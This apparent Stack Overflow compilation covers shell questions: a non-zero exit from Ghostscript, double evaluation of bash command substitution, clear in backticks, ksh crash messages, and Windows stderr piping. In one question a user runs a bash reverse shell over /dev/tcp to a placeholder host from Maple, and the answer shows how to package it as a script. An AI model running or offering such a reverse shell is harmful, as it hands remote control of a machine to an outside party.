PostScript-equivalent to exit(EXIT_FAILURE) - How to exit PostScript with a non-zero exit value? - ghostscript

I know the PostScript equivalent of exit(EXIT_SUCCESS): it is the quit operator. However, quit does not take any arguments; it is just quit, not 0 quit or 1 quit.
I'm looking for the PostScript equivalent of exit(EXIT_FAILURE). If necessary, it can be assumed that the PostScript interpreter is Ghostscript.
It can furthermore be assumed that the normally discouraged behavior of quit, namely terminating the PostScript interpreter, is not just accepted but even desired in this case.

Here's one way that appears to work with simple command line testing.
$ gsnd -q -c 'errordict/handleerror{stop}put (theres-no-file-with-this-name)run'
GPL Ghostscript 9.54.0: Unrecoverable error, exit code 1
$ echo $?
1
Calling run on a file that does not exist triggers the invalidfileaccess error requested by the -dSAFER switch hidden in the gsnd script. Replacing errordict /handleerror with {stop} suppresses the printing of the long error report.
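The same effect is available without relying on a missing file: raise any PostScript error on purpose, and Ghostscript turns the resulting unrecoverable error into exit code 1. A minimal sketch (the name /oops is my invention; executing any undefined name raises /undefined):

```shell
# guard: only meaningful where Ghostscript is installed
if command -v gs >/dev/null 2>&1; then
  # replace handleerror to suppress the long report, then execute an
  # undefined name so the /undefined error aborts the interpreter
  gs -q -dNODISPLAY -c 'errordict /handleerror {stop} put /oops cvx exec' >/dev/null 2>&1
  echo "gs exit status: $?"
fi
```

Any other deliberate error (rangecheck, undefinedfilename, ...) should work the same way, since Ghostscript reports them all through the same unrecoverable-error path.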

Related

bash race condition using generated output file name

I am trying to generate output using a randomized file name. "Generating" is simulated with "cat" in this example:
cat report.csv > "test_$(openssl rand -base64 102).csv"
I often get an error like this:
-bash: test_Q6eheRaVfktCTCfWSU/tjRNA1y+6juwlyuo1lEId/7HZTCQIE7/rt+/9MlTI+pjT
9It3l7FtBldMmaqHNWpspwCI5kCpR+s51RA2o9xAZ6BrZ+7UBR5atK9qWdSO/N/X
BAnvDkGm.csv: No such file or directory
The more random characters I use, the higher the probability of this error, which suggests a race condition. Solving the problem by using a variable for the random characters is obvious and is not what I am asking. Rather, my question is: what are the individual steps that bash performs, and where is the race condition?
I would have thought that bash executes the command as follows:
Create a pipe to capture the output of openssl rand
fork/exec openssl rand, passing that file handle as stdout, and wait for the process to finish (and check error status)
read from the pipe to get the value used in string interpolation, then close the pipe
perform string interpolation to build the output file name
open the output file
fork/exec cat, passing the handle for the output file as stdout
wait for the process to finish (and check error status), then close the output file
Nothing here suggests a race condition. I could imagine that bash instead runs cat in parallel and opens another pipe to buffer its output before it goes into the output file, but that wouldn't cause a "No such file or directory" either.
As was commented, slashes in the filename are an obvious problem, but the error occurs even without slashes. Setting the number of random bytes to 8 sometimes produces errors like this, without a slash and with the correct number of characters (so no slash was hidden):
-bash: test_9od1IhDt5A4=.csv: No such file or directory
The following command waits 2 seconds, then runs the command. In exactly those cases where the strange error message appears, it waits 4 seconds instead. Is there some kind of retry logic in bash that does this?
cat report.csv > "test_$(sleep 2; openssl rand -base64 9).csv"
Confirmed the double execution by echoing to stderr instead of sleeping:
cat report.csv > "test_$(echo foo 1>&2; openssl rand -base64 9).csv"
Several things are happening here.
The key part is that an error in the command substitution causes it to be evaluated twice. This seems to be a bug in the bash version used by Apple. The changelog at https://github.com/bminor/bash/blob/master/CHANGES says for version bash-4.3-alpha: "Fixed a bug that could result in double evaluation of command substitutions when they appear in failed redirections." I ran my tests on "GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin18)", the version pre-installed on macOS.
Steps to reproduce this bug in a simple way:
lap47:~/Documents> echo foo > "test_$(echo bar 1>&2; echo 'foo')"
bar
lap47:~/Documents> echo foo > "test_$(echo bar 1>&2; echo 'f/oo')"
bar
bar
-bash: test_f/oo: No such file or directory
lap47:~/Documents>
The second important part is that evaluating the command substitution twice invokes openssl rand twice, producing different random numbers. The second invocation seems to be used to generate the error message after the redirection failed. This way, the error message does not reflect the condition that caused the error.
Finally, the root cause of the failed redirection is indeed a slash in the file name. The failure causes the substitution to be evaluated again, producing a different file name which quite likely does not contain a slash.
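For completeness, the usual repair combines both insights: capture the substitution once into a variable (so a failed redirection cannot re-run openssl) and translate the base64 characters that are awkward in file names. A sketch; the tr mapping to the URL-safe alphabet is my choice, not from the question:

```shell
# capture once, so a failed redirection cannot re-evaluate the substitution;
# then map '/' and '+' (legal in base64, awkward in file names) to '_' and '-'
rand_part=$(openssl rand -base64 9 | tr '/+' '_-')
name="test_${rand_part}.csv"
case $name in
  */*) echo "still contains a slash" ;;
  *)   echo "safe name: $name" ;;
esac
```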

using sleep and clear command in bash script

I am learning Bash script.
Inside my script, I've tried clear and sleep 1.
sleep 1 runs as expected, but clear fails with a "command not found" error.
Why is that?
clear and sleep 1 are enclosed within backticks in my script. Stack Overflow uses those symbols to indicate code, and I don't know how to escape them here.
I assume you are trying this:
$(clear)
Or this:
`clear`
These are two ways of expressing command substitution. The first one is more readable and should be preferred, but they do the same thing.
The solution is to simply use this:
clear
Now, if you are interested in understanding why you are getting this error, here is a longer explanation.
Command substitution captures the output of the enclosed command -- its standard output (file descriptor 1), not its standard error (file descriptor 2), to be more precise -- and then provides this output as a string to be used as part of the command where it was found, as if it had been part of the command to start with (but not subject to further expansions).
The clear command emits a special escape sequence that causes the terminal screen to clear. But by enclosing clear in backticks, this sequence is not sent to the terminal (the terminal does not clear); it is instead captured by the command substitution. The captured sequence is then provided as if it had been typed on the command line, and since it is the first (and only) thing on that line, the shell tries to find a command whose name is that escape sequence. It does not find one, and that is where you get the "command not found" error.
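You can reproduce this without clear itself. Assuming an ANSI terminal, where clearing is done with the escape sequence ESC [ H ESC [ 2 J, simulating the captured output with printf shows the same failure mode:

```shell
# simulate the output `clear` would produce on an ANSI terminal
captured=$(printf '\033[H\033[2J')

# run the captured text as a command, as the shell does with a bare $(clear);
# no command has that name, so the lookup fails with status 127
status=0
"$captured" 2>/dev/null || status=$?
echo "status: $status"   # status: 127 (command not found)
```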
Just for fun, try this:
$(clear >&2)
It will clear the screen and not trigger an error, because the output is redirected to file descriptor 2 (standard error), which is not captured by the command substitution and is actually sent to the terminal (which clears). Since there is no other output, the command substitution evaluates to an empty string, which Bash interprets as a request to do nothing (Bash does not try to find a command with a zero-length name).
I hope this helps you understand the reason you are getting this error.
Backquotes are used on Stack Overflow to indicate that a string should be shown as code. Your real code doesn't need backquotes:
echo "Hello from commandline"
sleep 3
echo "After sleeping, will try to use clear in 4 seconds"
sleep 1
echo "will try to use clear in 3 seconds"
sleep 1
echo "will try to use clear in 2 seconds"
sleep 1
echo "will try to use clear in 1 second"
sleep 1
clear
When you see backquotes in Unix code, you are looking at an old-fashioned way to call another command during the execution of a command.
echo "Current time is `date`, so hurry!"
Now we write this as
echo "Current time is $(date), so hurry!"
It is one character more in this simple case, but much better when nesting things. I will not even try to write the next example with backquotes:
echo "Previous command returned $(echo "Current time is $(date), so hurry!")."

bash: &: No such file or directory

I am running the following command from maple (the function system works just like functions such as os.system from python):
system("bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1")
However, it fails and this is the output:
bash: no job control in this shell
bash: &: No such file or directory
Exit Value: 127
The weird thing is that the command works great when calling it from Terminal...
Any suggestions of how I could fix this?
"No job control" means that you can't bring background jobs into the foreground when running an interactive shell.
I would focus the analysis on the wording of the second error message. We know from it that bash is running. My guess is that Maple (not knowing the meaning of the >& WORD construct in bash) tokenizes the string on whitespace and shell metacharacters, and then does something like execv("bash", ["bash", "-i", "&", "/dev/tcp/myownip/myport", ...]). At least this would explain the error message: bash treats & as the name of a script file to run and cannot find it.
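That guess is easy to check from any shell, because bash treats its first non-option argument as the path of a script to run; handing it a literal & reproduces the exact message and exit status from the question (a sketch, independent of Maple):

```shell
# bash interprets a non-option argument as a script path;
# a literal '&' is not a file, hence the familiar complaint
msg=$(bash '&' 2>&1)
status=$?
echo "$msg"        # bash: &: No such file or directory
echo "$status"     # 127
```

Exit status 127 is the shell's conventional "command/file not found" code, matching the "Exit Value: 127" that Maple reported.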
Could you try the following? Create a stand-alone two-line bash script like this:
#!/usr/bin/bash
bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1
Set it to executable, and then invoke it from Maple with
system("yourpath/yourscript")
At least the error message No such file or directory should be gone.

avoid error message on command crash in ksh

I have a program that crashes. I know it does, it's supposed to in order to test some trap handling. The crash is expected behavior.
When I run the program from ksh, the shell insists on printing helpful little messages like:
./fpe.ksh: line 9: 105778: Floating exception
How do I make it stop that? I want the shell script to ignore the crash and keep going, without the error message.
For whatever program is on line 9:
program 2> >(sed '/Floating exception/d')
Find the command that is producing the error and add a redirection to the end, e.g.:
command > /dev/null 2>&1
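Another option, assuming the message is printed by the shell instance that reaps the crashed process: run the crashing command in a subshell whose stderr is redirected, so the notice lands in the discarded stream while the script keeps going. Sketched here with a stand-in child that sends itself SIGFPE (signal 8) instead of a real crashing program:

```shell
# stand-in for the crashing program: a child that dies of SIGFPE
( sh -c 'kill -8 $$' ) 2>/dev/null
status=$?
# 128 + 8 = 136 marks death by signal 8; the script continues normally
echo "continued, status: $status"
```

The subshell is what matters: the "Floating exception" notice is written to the subshell's stderr, which points at /dev/null, while the parent script still sees the signal-death status and can test for it.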

Redirecting standard error & output streams is postponed

I need to redirect the output & error streams from one Windows process (GNU make.exe running the armcc toolchain) to a filter written in Perl. The command I am running is:
Make Release 2>&1 | c:\cygwin\bin\perl ../tools/armfilt.pl
The compilation process produces output that should be written to STDOUT after some modifications. But I ran into a problem: all output generated by make is postponed until the end of make's run, and only then shown to the user. So, my questions are:
Why does this happen? I have tried raising the priority of the second process (perl.exe) from "Normal" to "Above normal", but it didn't help...
How to overcome this problem?
I think one possible workaround may be to send only the STDERR output to perl (which is all I actually need), not STDOUT+STDERR. But I don't know how to do that in Windows.
The Microsoft explanation concerning pipe operator usage says:
The pipe operator (|) takes the output (by default, STDOUT) of one
command and directs it into the input (by default, STDIN) of another
command.
But how to change this default STDOUT piping is not explained. Is it possible at all?
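Piping only STDERR is possible, because redirections are processed left to right: 2>&1 first points stderr at the pipe, and 1>nul then discards stdout, so in cmd.exe something like Make Release 2>&1 1>nul | perl ... should pass only the error stream to the filter. The delay itself, though, is most likely stdio buffering on one side of the pipe (Perl, for instance, block-buffers STDOUT when it is not a terminal; setting $| = 1 in armfilt.pl usually helps). A bash sketch of the stream swap, with a stand-in for Make:

```shell
# stand-in for `Make Release`: one line to stdout, one to stderr
gen() { echo "normal output"; echo "error output" >&2; }

# 2>&1 duplicates stderr onto the pipe first; 1>/dev/null then discards
# stdout, so only the stderr line reaches the filter
gen 2>&1 1>/dev/null | sed 's/^/filtered: /'
# prints: filtered: error output
```

The same left-to-right ordering rule applies in cmd.exe, with nul in place of /dev/null.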
